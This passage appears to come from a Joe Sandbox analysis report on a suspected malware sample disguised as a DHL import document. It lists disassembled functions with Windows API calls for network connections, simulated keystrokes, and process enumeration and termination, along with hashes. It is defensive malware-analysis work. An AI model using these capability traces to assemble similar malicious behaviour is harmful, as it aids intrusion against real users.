                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                          • String ID:
                                                                                          • API String ID: 3210457359-0
                                                                                          • Opcode ID: b84119a3740f7061eaee722b9a0db63b8e54a0e83b76f548cf60a5e035781e99
                                                                                          • Instruction ID: de67ea6c467a762176bc60236d94cfb9140d50f577db4f4caa352938cbc13e79
                                                                                          • Opcode Fuzzy Hash: b84119a3740f7061eaee722b9a0db63b8e54a0e83b76f548cf60a5e035781e99
                                                                                          • Instruction Fuzzy Hash: 6A51C170A41A08FFEF219F28CC5ABD93B65FB06325F164012F625D63E0C7B5A990DB51
                                                                                          Function 007E8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00826890
                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008268A9
                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008268B9
                                                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008268D1
                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008268F2
                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,007E8874,00000000,00000000,00000000,000000FF,00000000), ref: 00826901
                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0082691E
                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,007E8874,00000000,00000000,00000000,000000FF,00000000), ref: 0082692D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 1268354404-0
                                                                                          • Opcode ID: e6a316dff5ec72858c45d7a823889459c962b978412d91c034a0e367a26ff2a4
                                                                                          • Instruction ID: eb2ea188d294101999f445abadce5a54f153c38417463cda79c661a066913d03
                                                                                          • Opcode Fuzzy Hash: e6a316dff5ec72858c45d7a823889459c962b978412d91c034a0e367a26ff2a4
                                                                                          • Instruction Fuzzy Hash: FF519AB0600249EFDB20CF29DC55FAA7BB5FB48350F104528F956D72A0EBB4E990DB40
                                                                                          Function 0084C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0084C182
                                                                                          • GetLastError.KERNEL32 ref: 0084C195
                                                                                          • SetEvent.KERNEL32(?), ref: 0084C1A9
                                                                                            • Part of subcall function 0084C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084C272
                                                                                            • Part of subcall function 0084C253: GetLastError.KERNEL32 ref: 0084C322
                                                                                            • Part of subcall function 0084C253: SetEvent.KERNEL32(?), ref: 0084C336
                                                                                            • Part of subcall function 0084C253: InternetCloseHandle.WININET(00000000), ref: 0084C341
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                          • String ID:
                                                                                          • API String ID: 337547030-0
                                                                                          • Opcode ID: 75de4445b8b5bf20d59f39cbb57021e6e326aab50c0207004565157a32493f1a
                                                                                          • Instruction ID: 41b109a588753690404ae78a513322b1fdc149cd0907ec95e0cddd4d585be3c5
                                                                                          • Opcode Fuzzy Hash: 75de4445b8b5bf20d59f39cbb57021e6e326aab50c0207004565157a32493f1a
                                                                                          • Instruction Fuzzy Hash: 97318F71602649AFDB619FB5DD44A76BBFDFF18300B00442EF996C2620DBB1E8149B60
                                                                                          Function 008325A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00833A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00833A57
                                                                                            • Part of subcall function 00833A3D: GetCurrentThreadId.KERNEL32 ref: 00833A5E
                                                                                            • Part of subcall function 00833A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008325B3), ref: 00833A65
                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 008325BD
                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008325DB
                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008325DF
                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 008325E9
                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00832601
                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00832605
                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0083260F
                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00832623
                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00832627
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2014098862-0
                                                                                          • Opcode ID: a4b008691c376bad15793c5382c0ccc9bf80e001016108844cf1b025860233eb
                                                                                          • Instruction ID: cde2a2a633c31cb34655938ad20435f07b4c0e481999eedf88faced651d6f56e
                                                                                          • Opcode Fuzzy Hash: a4b008691c376bad15793c5382c0ccc9bf80e001016108844cf1b025860233eb
                                                                                          • Instruction Fuzzy Hash: 6F01D830390624BBFB107768DC8AF693F59FF9EB11F111005F354EE0D1C9E124448AAA
                                                                                          Function 00831803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00831449,?,?,00000000), ref: 0083180C
                                                                                          • HeapAlloc.KERNEL32(00000000,?,00831449,?,?,00000000), ref: 00831813
                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00831449,?,?,00000000), ref: 00831828
                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00831449,?,?,00000000), ref: 00831830
                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00831449,?,?,00000000), ref: 00831833
                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00831449,?,?,00000000), ref: 00831843
                                                                                          • GetCurrentProcess.KERNEL32(00831449,00000000,?,00831449,?,?,00000000), ref: 0083184B
                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00831449,?,?,00000000), ref: 0083184E
                                                                                          • CreateThread.KERNEL32(00000000,00000000,00831874,00000000,00000000,00000000), ref: 00831868
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 1957940570-0
                                                                                          • Opcode ID: 1e922e2c32b2615c1fb18d1ff600451bce142478eefe272177689819de236dc1
                                                                                          • Instruction ID: 2e43a244d80bebe053aaaad723e4c2caaa093399c7cfc34fc813b6410cbd0df0
                                                                                          • Opcode Fuzzy Hash: 1e922e2c32b2615c1fb18d1ff600451bce142478eefe272177689819de236dc1
                                                                                          • Instruction Fuzzy Hash: 1201BBB5240348BFE710ABA5DC4DF6B7BACFB8AB11F015411FA45DB2A1CAB59800CB70
                                                                                          Function 0085A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0083D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0083D501
                                                                                            • Part of subcall function 0083D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0083D50F
                                                                                            • Part of subcall function 0083D4DC: CloseHandle.KERNEL32(00000000), ref: 0083D5DC
                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0085A16D
                                                                                          • GetLastError.KERNEL32 ref: 0085A180
                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0085A1B3
                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0085A268
                                                                                          • GetLastError.KERNEL32(00000000), ref: 0085A273
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0085A2C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                          • String ID: SeDebugPrivilege
                                                                                          • API String ID: 2533919879-2896544425
                                                                                          • Opcode ID: a3fd323f1cef508acc8269ff10a0e49cce8d364734e4daddabcdbb702458c34b
                                                                                          • Instruction ID: 179cca3ad32586910f3e31681ef658fffb1b97ab2fa80efbed0c9ae0cfa489ba
                                                                                          • Opcode Fuzzy Hash: a3fd323f1cef508acc8269ff10a0e49cce8d364734e4daddabcdbb702458c34b
                                                                                          • Instruction Fuzzy Hash: BC617C312082429FD714DF18C4D9F25BBA1FF44319F18858CE8668B7A2C7B6EC49CB92
                                                                                          Function 00863886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00863925
                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0086393A
                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00863954
                                                                                          • _wcslen.LIBCMT ref: 00863999
                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 008639C6
                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008639F4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window_wcslen
                                                                                          • String ID: SysListView32
                                                                                          • API String ID: 2147712094-78025650
                                                                                          • Opcode ID: 57005d605aa196ccd2b1e31632543b6f2a56e725e47b94a6959e1d58e9efb42a
                                                                                          • Instruction ID: 337910a69c09f2191850d604dfe03dac6532d8c8b3d26fb7a59ddf7128e131c8
                                                                                          • Opcode Fuzzy Hash: 57005d605aa196ccd2b1e31632543b6f2a56e725e47b94a6959e1d58e9efb42a
                                                                                          • Instruction Fuzzy Hash: BC41A571A00219ABEF219F64CC49FEA7BA9FF08354F11052AF959E7281D7B59D80CB90
                                                                                          Function 0083BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0083BCFD
                                                                                          • IsMenu.USER32(00000000), ref: 0083BD1D
                                                                                          • CreatePopupMenu.USER32 ref: 0083BD53
                                                                                          • GetMenuItemCount.USER32(00D95280), ref: 0083BDA4
                                                                                          • InsertMenuItemW.USER32(00D95280,?,00000001,00000030), ref: 0083BDCC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                          • String ID: 0$2
                                                                                          • API String ID: 93392585-3793063076
                                                                                          • Opcode ID: 6f56d075126500bd95454ad9bae9409e58424027189e612d5bad42482c8f97c7
                                                                                          • Instruction ID: 66ee049a7c0a492ec0f99d3cdf12c4639334d7507380c36f3b2a949ca940f673
                                                                                          • Opcode Fuzzy Hash: 6f56d075126500bd95454ad9bae9409e58424027189e612d5bad42482c8f97c7
                                                                                          • Instruction Fuzzy Hash: D451AFB0A042099BDF20DFA8D888BAEBBF4FF85354F144159E651E7291D7709D41CBA2
                                                                                          Function 0083C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 0083C913
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconLoad
                                                                                          • String ID: blank$info$question$stop$warning
                                                                                          • API String ID: 2457776203-404129466
                                                                                          • Opcode ID: 4ba74bc0edc418b03ebe81eb3975848c5e1dffbdd323d634e85ddd7aaeec0892
                                                                                          • Instruction ID: bab7d15ca90692d81cc114e08681ce32b5298a3fc636daae829ebf2897bb04ce
                                                                                          • Opcode Fuzzy Hash: 4ba74bc0edc418b03ebe81eb3975848c5e1dffbdd323d634e85ddd7aaeec0892
                                                                                          • Instruction Fuzzy Hash: E711EE3268930ABAEB016B549C82DBB7B9CFF55354F11406AF900F5381E7A46F0053A4
                                                                                          Function 0083ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$LocalTime
                                                                                          • String ID:
                                                                                          • API String ID: 952045576-0
                                                                                          • Opcode ID: bbe7c49a4c260f75ec83b795a58db11bb3c5e4c8c3dd2991a342aad301fd4de3
                                                                                          • Instruction ID: 9005b4fee67a1573adadde7ea8da5e073b54b8f6bed06060ebee01e094dfbc77
                                                                                          • Opcode Fuzzy Hash: bbe7c49a4c260f75ec83b795a58db11bb3c5e4c8c3dd2991a342aad301fd4de3
                                                                                          • Instruction Fuzzy Hash: 4441AF66D1021CB6CB11EBF4888A9DFB3A8FF45700F408466E614E3261EB38E245C3E6
                                                                                          Function 007EF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 007EF953
                                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 0082F3D1
                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0082682C,00000004,00000000,00000000), ref: 0082F454
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ShowWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1268545403-0
                                                                                          • Opcode ID: 26150dfb17ba74dbefc8f65ad767d487d86ae40b3e88b3a5934f550e8830f05a
                                                                                          • Instruction ID: d1eba26eeb5312bf5f89ef1a611ae41b32a76ec02e6ec90a9d37ff01e858f902
                                                                                          • Opcode Fuzzy Hash: 26150dfb17ba74dbefc8f65ad767d487d86ae40b3e88b3a5934f550e8830f05a
                                                                                          • Instruction Fuzzy Hash: 9941E6316096C0BAD7359B2A988CB2A7AA1BB5E314F15443DE1C7D6E63C679B8C0CB11
                                                                                          Function 00862D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteObject.GDI32(00000000), ref: 00862D1B
                                                                                          • GetDC.USER32(00000000), ref: 00862D23
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00862D2E
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00862D3A
                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00862D76
                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00862D87
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00865A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00862DC2
                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00862DE1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3864802216-0
                                                                                          • Opcode ID: cc2e2a804e71d937c05ea8e758b3d4ded2ba2c9d6dcf9ac44a3ad581948152a4
                                                                                          • Instruction ID: fde8fb903ffbc60a23ac92f5e6cde3b8c0f396abf1542907a8265363824b14a2
                                                                                          • Opcode Fuzzy Hash: cc2e2a804e71d937c05ea8e758b3d4ded2ba2c9d6dcf9ac44a3ad581948152a4
                                                                                          • Instruction Fuzzy Hash: 47318772201614BBEB218F54DC8AFFB3BA9FB09715F0550A5FE48DA291C6B59C40CBA4
                                                                                          Function 00835622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 2931989736-0
                                                                                          • Opcode ID: 8daf8397625525775e40556ad3c29ed58928fc53b2d2f6be8ca8299c6dd0d551
                                                                                          • Instruction ID: 45820001bf4c1f75dcc1ad0f6418d34b1c979b0d8077dce72757c3e108fc792f
                                                                                          • Opcode Fuzzy Hash: 8daf8397625525775e40556ad3c29ed58928fc53b2d2f6be8ca8299c6dd0d551
                                                                                          • Instruction Fuzzy Hash: 2A2180A1644A1DFBD21456209E83FBA235DFFB0394F850020FE05DA782F768ED10C6E5
                                                                                          Function 00854FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                          • API String ID: 0-572801152
                                                                                          • Opcode ID: 6f888af29973e4d308f58eeb948eb828a389bcde8596015cedb5eef550413395
                                                                                          • Instruction ID: 871cc27213e9bda3a34126ad7cc6038c82ad7036367c061c562b595e546b8cb7
                                                                                          • Opcode Fuzzy Hash: 6f888af29973e4d308f58eeb948eb828a389bcde8596015cedb5eef550413395
                                                                                          • Instruction Fuzzy Hash: ECD1B171A0060A9FDF10CFA8C8A1BAEB7B5FF48355F148069E915EB281E771DD49CB90
                                                                                          Function 00811522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(?,?), ref: 008115CE
